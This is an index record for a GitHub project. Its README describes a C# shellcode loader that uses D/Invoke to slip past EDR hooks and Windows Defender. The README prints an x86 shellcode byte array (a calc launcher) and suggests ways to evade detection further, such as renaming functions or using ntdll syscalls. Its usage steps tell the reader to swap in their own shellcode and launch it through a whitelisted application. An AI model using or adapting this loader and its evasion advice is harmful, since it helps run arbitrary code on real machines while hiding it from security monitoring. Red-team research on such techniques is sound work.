{"id":13841018,"url":"https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp","last_synced_at":"2025-07-11T10:30:43.733Z","repository":{"id":136106601,"uuid":"382256905","full_name":"Kara-4search/DInvoke_shellcodeload_CSharp","owner":"Kara-4search","description":"ShellCodeLoader via DInvoke","archived":false,"fork":false,"pushed_at":"2021-07-05T02:31:49.000Z","size":32,"stargazers_count":49,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-11-19T03:49:09.773Z","etag":null,"topics":["bypass","bypass-antivirus","bypass-windows-defender","csharp","dinvoke","redteam","shellcodeloader"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Kara-4search.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-07-02T06:49:19.000Z","updated_at":"2024-10-16T03:27:59.000Z","dependencies_parsed_at":"2023-12-07T16:30:40.703Z","dependency_job_id":null,"html_url":"https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FDInvoke_shellcodeload_CSharp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FDInvoke_shellcodeload_CSharp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FDInvoke_shellcodeload_CSharp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FDI
nvoke_shellcodeload_CSharp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kara-4search","download_url":"https://codeload.github.com/Kara-4search/DInvoke_shellcodeload_CSharp/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225713021,"owners_count":17512538,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","bypass-antivirus","bypass-windows-defender","csharp","dinvoke","redteam","shellcodeloader"],"created_at":"2024-08-04T17:01:01.450Z","updated_at":"2024-11-21T10:31:18.636Z","avatar_url":"https://github.com/Kara-4search.png","language":"C#","readme":"# DInvoke_shellcodeload_CSharp\n\nBlog link: may not be updated.\n\n* A ShellcodeLoader based on another project of mine (https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp), inspired by TheWover (https://github.com/TheWover).\n* The purpose is to bypass EDR API hooks, or detection of dangerous API calls.\n* Uses D/Invoke to load shellcode into memory.\n* **I removed a lot of unnecessary code from the original project to make the code easier to understand.**\n* You could change the function names or do other magic to make it better at EDR bypassing.\n* I only tested it on x86 with the shellcode below (it is a calc shellcode), but it should also work on x64.\n\n  ```c#\n  byte[] codepent = new byte[193] {\n                  0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,\n                  0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,\n                  
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,\n                  0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,\n                  0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,\n                  0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,\n                  0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,\n                  0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,\n                  0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,\n                  0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,\n                  0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,\n                  0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,\n                  0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00\n  };\n  ```\n\n* You could use API Monitor (http://www.rohitab.com/apimonitor) to test the project: compared with the SimpleLoader (https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp), you can see that no API calls are recorded for the D/Invoke version.\n* The kernel32 functions are not good enough; you could even do the ntdll version of this (NtAllocateVirtualMemory, NtCreateThreadEx and NtWaitForSingleObject in place of VirtualAlloc, CreateThread and WaitForSingleObject).\n\n\n## Usage\n\n1. Just replace the shellcode.\n2. Launch it through some whitelisted application.\n\n\n## Comparing via API Monitor\n\nThere are mainly three APIs we are going to monitor:\n\n* VirtualAlloc\n* CreateThread\n* WaitForSingleObject\n\n1. In the picture below, the SimpleLoader's API calls are caught by API Monitor.\n   ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/APIMon-Result1.png)\n\n2. The **DInvoke ShellcodeLoader**'s API calls were not caught by API Monitor.\n   ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/APIMon-Result2.png)\n\n\n## Reference links:\n\n1. 
https://github.com/CCob/SharpBlock\n2. https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/\n3. https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/\n4. https://thewover.github.io/Dynamic-Invoke/\n5. https://offensivedefence.co.uk/posts/dinvoke-syscalls/\n6. https://github.com/TheWover/DInvoke\n7. http://www.rohitab.com/discuss/topic/38807-api-monitor-v2-r10-release-instant-monitoring-without-definitions-support-for-dllmain-and-early-apis-windows-8/\n8. https://vimeo.com/566964438\n9. https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread\n10. https://docs.microsoft.com/en-us/dotnet/api/microsoft.visualstudio.shell.interop.vsdebugstartupinfo.dwcreationflags?view=visualstudiosdk-2019\n\n","funding_links":[],"categories":["C# #"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FKara-4search%2FDInvoke_shellcodeload_CSharp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FKara-4search%2FDInvoke_shellcodeload_CSharp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FKara-4search%2FDInvoke_shellcodeload_CSharp/lists"}